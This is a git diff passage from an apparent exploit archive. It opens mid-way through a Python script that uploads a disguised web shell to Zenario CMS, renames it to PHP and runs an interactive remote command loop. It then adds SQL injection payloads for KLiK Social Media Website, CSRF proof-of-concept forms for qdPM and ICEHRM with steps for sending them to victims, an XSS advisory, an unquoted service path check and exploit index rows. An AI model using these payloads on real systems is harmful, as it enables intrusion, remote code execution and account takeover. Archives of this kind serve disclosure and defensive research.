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\nCwDBAgAAvSsAAAAA\n" +file_name = uuid.uuid4().hex +file = open(file_name + ".docx", "wb") +file.write(base64.decodebytes(file_content)) +file.close() + +### Upload docx file +resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload", + headers={"Cookie":PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"id":"", "fileUpload": 1, }, + files={"Filedata": open(file_name + ".docx", "rb")}) + +### Get sync id file +resp_body = json.loads(resp.text) +id_sync = resp_body["id"] + +# Update database +resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", + headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'}) + +# If upload OK +print("Upload file OK!") + + +## Change file extension +### Search ID file in Database +resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name, headers={"Cookie": PHPSESSID}) +resp_body = json.loads(resp.text) + +file_id = resp_body["__item_sort_order__"]["0"] + +### Get sync info +resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), + headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"_fill": "true", "_values": ""}) + +resp_body = json.loads(resp.text) + +password_sync = resp_body["_sync"]["password"] +iv_sync = resp_body["_sync"]["iv"] +cache_dir_sync = resp_body["_sync"]["cache_dir"] + +### Change to .php +resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), + headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + '"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'}) + +## Get public URL webshell +resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", + headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"id": file_id, "generate_public_link": 1}) + +response_body = resp.text +web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36] + +# If web shell OK +print("Web shell is available!") +print("URL:", web_shell_url) +print("Enter command.") + + +## Execute command +cmd = '' +while cmd != "exit": + ### Get command + cmd = input("> ") + + ### Get result + resp = requests.post(web_shell_url, data={"cmd": cmd}) + response_body = resp.text + result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")] + + print(result) + pass + +## Delete web shell +resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", + headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"id": file_id, "delete": 1}) +print("Web shell is deleted!") + +# Delete docx file +os.remove(file_name + ".docx") +print("Docx file is deleted!") \ No newline at end of file diff --git a/exploits/php/webapps/50851.txt b/exploits/php/webapps/50851.txt new file mode 100644 index 000000000..9d2d042fb --- /dev/null +++ b/exploits/php/webapps/50851.txt @@ -0,0 +1,30 @@ +# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi +# Date: April 1st, 2022 +# Exploit Author: corpse +# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite +# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite +# Version: 1.0 +# Tested on: Debian 11 + +Parameter: poll (GET) + Type: time-based blind + Title: MySQL time-based blind - Parameter replace (ELT) + Payload: poll=ELT(1079=1079,SLEEP(5)) + +Parameter: pollID (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS) + +Parameter: voteOpt (POST) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15 \ No newline at end of file diff --git a/exploits/php/webapps/50853.txt b/exploits/php/webapps/50853.txt new file mode 100644 index 000000000..4288ccfb3 --- /dev/null +++ b/exploits/php/webapps/50853.txt @@ -0,0 +1,24 @@ +# Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS) +# Google Dork: NA +# Date: 02/20/2022 +# Exploit Author: Chetanya Sharma @AggressiveUser +# Vendor Homepage: https://mineweb.org/ +# Software Link: https://github.com/mineweb/minewebcms +# Version: 1.15.2 +# Tested on: KALI OS +# CVE : CVE-2022-1163 +# +--------------- + +Steps to Reproduce:- +=> Install the WebApp and Setup it +=> Login in to webAPP using Admin Creds. +=> Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar" +=> Add/Edit a Link Select "Drop-Down Menu" +=> "Link Name" and "URL" Both Input are Vulnerable to Exploit Simple XSS +=> Payload : +=> XSS will trigger on "http://localhost/MineWebCMS-1.15.2/" Aka WebApp HOME Page + +Note : As you can see this simple payload working in those two inputs as normally . Whole WebApp Admin Input Structure is allow to do HTML Injection or XSS Injection + +References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/ \ No newline at end of file diff --git a/exploits/php/webapps/50854.txt b/exploits/php/webapps/50854.txt new file mode 100644 index 000000000..4cf20ecc8 --- /dev/null +++ b/exploits/php/webapps/50854.txt @@ -0,0 +1,32 @@ +# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF) +# Google Dork: NA +# Date: 03/27/2022 +# Exploit Author: Chetanya Sharma @AggressiveUser +# Vendor Homepage: https://qdpm.net/ +# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download +# Version: 9.2 +# Tested on: KALI OS +# CVE : CVE-2022-26180 +# +--------------- + +Steps to Exploit : + 1) Make an HTML file of given POC (Change UserID field Accordingly)and host it. + 2) send it to victim. + +qdPM Open Source Project Management - qdPM 9.2 (CSRF POC) + + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50855.txt b/exploits/php/webapps/50855.txt new file mode 100644 index 000000000..97db5f5cd --- /dev/null +++ b/exploits/php/webapps/50855.txt @@ -0,0 +1,52 @@ +# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion +# Date: 29/03/2022 +# Exploit Author: Devansh Bordia +# Vendor Homepage: https://icehrm.com/ +# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS +# Version: 31.0.0.OS +#Tested on: Windows 10 +# CVE: CVE-2022-26588 + +1. About - ICEHRM +IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. + +2. Description: +The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. + +3. Steps To Reproduce: + +1.) Now login into the application and go to users. +2.) After this add an user with the name Devansh. +3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request. +4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/ +5.) Now generate a csrf poc for post based requests with necessary parameters. +6.) Finally open that html poc and execute in the same browser session. +7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability. + +4. Exploit POC (Exploit.html) + + +
+ + + + + + + + + + + + + +
t + +
a + +
id + +
+
+ \ No newline at end of file diff --git a/exploits/windows/local/50852.txt b/exploits/windows/local/50852.txt new file mode 100644 index 000000000..c808d3048 --- /dev/null +++ b/exploits/windows/local/50852.txt @@ -0,0 +1,36 @@ +# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path +# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid) +# Version: 2020.2.20328.2050 +# Date: 02/04/2022 +# Vendor Homepage: http://gimmal.com/ +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 +# CVE: CVE-2022-23909 + + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode | findstr /i +"sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v +""" + +Sherpa Connector Service + Sherpa Connector Service C:\Program +Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe + Auto + +C:\>sc qc "Sherpa Connector Service" + +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Sherpa Connector Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa +Connector\SherpaConnectorService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Sherpa Connector Service + DEPENDENCIES : wmiApSrv + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 208e15cac..fa0021d05 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11474,6 +11474,8 @@ id,file,description,date,author,type,platform,port 50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows, 50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows, 50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows, +50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows, +50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18658,6 +18660,8 @@ id,file,description,date,author,type,platform,port 50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware, 50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,b4keSn4ke,remote,multiple, 50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware, +50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware, +50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44917,3 +44921,8 @@ id,file,description,date,author,type,platform,port 50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",1970-01-01,"Hassan Khan Yusufzai",webapps,php, 50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php, 50849,exploits/php/webapps/50849.txt,"WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS",1970-01-01,0xB9,webapps,php, +50850,exploits/php/webapps/50850.py,"Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,minhnq22,webapps,php, +50851,exploits/php/webapps/50851.txt,"KLiK Social Media Website 1.0 - 'Multiple' SQLi",1970-01-01,corpse,webapps,php, +50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php, +50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php, +50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php,